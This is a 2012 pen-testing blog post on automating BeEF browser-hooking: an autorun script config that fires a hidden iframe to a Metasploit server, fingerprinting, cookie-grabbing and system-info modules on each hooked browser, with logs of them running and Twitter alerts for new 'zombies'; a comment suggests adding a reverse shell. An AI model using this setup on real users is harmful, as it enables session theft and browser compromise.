Monday, August 13, 2012

Happy Hooking! - BeEF autorun and Twitter notify

Today's post is contributed by Ryan Linn.

In previous posts, we’ve looked at both how to use BeEF in a real world pen test, as well as how to use the REST API to automate common tasks in BeEF. In this post, we’re going to take a look at how to use the REST API to auto-run multiple modules at one time, and set up Twitter notification.

Why would we want to do this? In the Real World series, we looked at number of modules that can be helpful when profiling browsers. But, what if we want to run them automatically so we don’t have to point and click for each new hooked zombie? By default, BeEF allows for a single module to be auto-run. But, we can auto-run a number of different modules, and even customize them for specific browsers using the REST API.

Now we can easily manage more zombies coming in at a time from a social engineering campaign. Also, we have ensured that we have maximized the information we can get from the browser regardless how long a browser is hooked!

To get the scripts, start by going to https://github.com/SpiderLabs/beef_injection_framework and downloading the framework tools. There will be two tools that we’ll be looking at in this blog post. The first is the autorun.rb script that will handle the autorun functionality. The second is the dump_mod_info.rb script, that will output all of the modules we may use.

To get the list of modules, let’s begin by starting our BeEF Instance:

$ ./beef
[17:57:07][*] Browser Exploitation Framework (BeEF)
[17:57:07] | Version 0.4.3.6-alpha
[17:57:07] | Website http://beefproject.com
[17:57:07] | Run 'beef -h' for basic help.
[17:57:07] |_ Run 'git pull' to update to the latest revision.
[17:57:08][*] BeEF is loading. Wait a few seconds...
[17:57:08][*] 8 extensions loaded:
[17:57:08] | Events
[17:57:08] | Requester
[17:57:08] | Proxy
[17:57:08] | Console
[17:57:08] | XSSRays
[17:57:08] | Demos
[17:57:08] | Autoloader
[17:57:08] |_ Admin UI
[17:57:08][*] 114 modules enabled.
[17:57:08][*] 2 network interfaces were detected.
[17:57:08][+] running on network interface: 127.0.0.1
[17:57:08] | Hook URL: http://127.0.0.1:3000/hook.js
[17:57:08] |_ UI URL: http://127.0.0.1:3000/ui/panel
[17:57:08][+] running on network interface: 172.16.149.141

[17:57:08] | Hook URL: http://172.16.149.141:3000/hook.js
[17:57:08] |_ UI URL: http://172.16.149.141:3000/ui/panel
[17:57:08][*] RESTful API key: fba4fc47a6d56c4b23b29027a4ea4524c410643f
[17:57:08][*] HTTP Proxy: http://127.0.0.1:6789
[17:57:08][*] BeEF server started (press control+c to stop)

Next, lets dump the list of modules and pipe it into less:

$ ./dump_mod_info.rb | less

The first thing we want to do is to launch a hidden IFRAME to point to our Metasploit instance. To do this, lets find the module to create a hidden IFRAME.

When we find it in the less output, it looks like this:

MOD: invisible_iframe
Creates an invisible iframe.
OPTIONS:
  [{"name"=>"target", "ui_label"=>"URL", "value"=>"http://beefproject.com/"}]

We have one option to set: the “target.” The value is the URL we want to launch in the hidden IFRAME. To make this module auto-launch in the autorun.rb script, we open the autorun.rb script and find the autorun_mods hash.

The autorun_mods hash is a key value pair. The key is the name of the module to run, and the value is a hash of options. In this case, if we wanted to just run this one module pointing to http://localhost:8080 then we’d create our autorun_mods to be:

@autorun_mods = [
  { 'Invisible_iframe' => {'target' => 'http://127.0.0.1:8080/' }}
]

We want to do more than that though, so let’s add some more fingerprinting in:

@autorun_mods = [
  { 'Invisible_iframe' => {'target' => 'http:// 127.0.0.1:8080/' }},
  { 'Browser_fingerprinting' => {}},
  { 'Get_cookie' => {}},
  { 'Get_system_info' => {}}
]

This will launch browser fingerprinting, our invisible iframe, try to get the cookies for the visiting page, and launch a java applet that will try to fingerprint the browser’s system info. Now that this is all setup, we save our autorun.rb script and just run it:

$ ./autorun.rb

Now the script is running, we launch a browser to get hooked and watch our BeEF
window:

[18:11:45][*] New Hooked Browser [ip:127.0.0.1, type:FF-13, os:Linux], hooked domain [127.0.0.1:3000]
[18:11:50][*] Hooked browser 127.0.0.1 has been sent instructions from command module 'Create Invisible Iframe'
[18:11:50][*] Hooked browser 127.0.0.1 has been sent instructions from command module 'Fingerprint Browser'
[18:11:50][*] Hooked browser 127.0.0.1 has been sent instructions from command module 'Get Cookie'
[18:11:50][*] File [/home/sussurro/beef/modules/host/get_system_info/ getSystemInfo.class] bound to url [/getSystemInfo.class]
[18:11:50][*] Hooked browser 127.0.0.1 has been sent instructions from command module 'Get System Info'
[18:11:55][*] Hooked browser 127.0.0.1 has executed instructions from command module 'Get Cookie'
[18:11:55][*] Hooked browser 127.0.0.1 has executed instructions from command module 'Create Invisible Iframe'
[18:11:57][*] Hooked browser 127.0.0.1 has executed instructions from command module 'Fingerprint Browser'

We can see from the output that our auto-run script has executed the modules 5 seconds after our initial hook has taken place. This is far faster than if we had done this manually. From here, we can go into the user interface to view the results. Or, the autorun script spits out session, module, and command id’s to get the statuses of the run modules programmatically.

While these scripts are a good starting point, you may want to do more customization. This can be done by  modifying the Ruby and following the steps in the REST post and documentation.

The final piece we want to add is Twitter notification. Let's have a little birdie tell us when we've hooked our Zombies. This will make sure, if we have a social engineering campaign running, we can both auto-collect data and be notified when we start getting successes.

First we need to create a Twitter application at dev.twitter.com. Once logged in we want to create our application. Here’s the sample settings for my application, notice the permissions that are required to send DM’s.

BeEF Notifier Properties
BeEF Notifier Properties


Next, we need to create our personal access tokens for our account. To do this, there should be a link at the bottom of the page to authorize our account. Once we do, we should see another set of information about our access tokens like below:

Access Token
Access Token


Now we have all of the information to update BeEF to configure twitter notifications. We edit extensions/notifications/config.yaml and set enable to true under notifications and under twitter. Finally we configure our keys from the previous steps and our target usernames, save the file, and we should be all set.

Restart BeEF, login, and hit the link for the basic demo page, and you should get two DM’s like below:

DMs from Twitter
Direct Messages on Twitter
Now you’re all set for your campaign to begin. Sit back, wait on Twitter to tell you when you’ve got zombies, and automate as much as you can to maximize your success rate. Happy Hooking!

2 comments:

  1. If you can run a java applet for fingerprinting, can't you run a reverse shell and persistence too?

    ReplyDelete
  2. I was attempting to run some modules on beef at startup. i.e in the moudules insert autorun: true
    Im using kali linux. I thought to use the bleeding edge repositories to update to the very latest beef-xss. Unfortunately I still get the same errors:
    For example
    Unable to load module configuration '/usr/share/beef-xss/modules/host/get_internal_ip/config.yaml'

    Hoped someone could point me in the right direction.

    ReplyDelete